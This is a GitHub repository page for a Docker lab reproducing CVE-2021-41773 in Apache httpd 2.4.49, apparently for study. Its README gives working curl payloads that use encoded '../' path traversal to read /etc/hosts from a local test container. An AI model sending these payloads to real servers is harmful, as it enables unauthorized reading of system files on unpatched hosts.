CVE-2021-41773 (Apache httpd only 2.4.49)

For educational purposes only.

See Reference for the details.

Run

$ git clone https://github.com/masahiro331/CVE-2021-41773.git
$ cd CVE-2021-41773
$ docker build -t cve-2021-41773 .
$ docker run -d -p 8080:80 cve-2021-41773

Exploit

# This vulnerability affects the use of Alias.
$ curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
$ curl http://localhost:8080/webpath/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts

Reference

Fixed commit Vendor advisory

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
Dockerfile		Dockerfile
README.md		README.md
httpd.conf		httpd.conf

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2021-41773 (Apache httpd only 2.4.49)

Run

Exploit

Reference

About

Releases

Packages

Languages

masahiro331/CVE-2021-41773

Folders and files

Latest commit

History

Repository files navigation

CVE-2021-41773 (Apache httpd only 2.4.49)

Run

Exploit

Reference

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages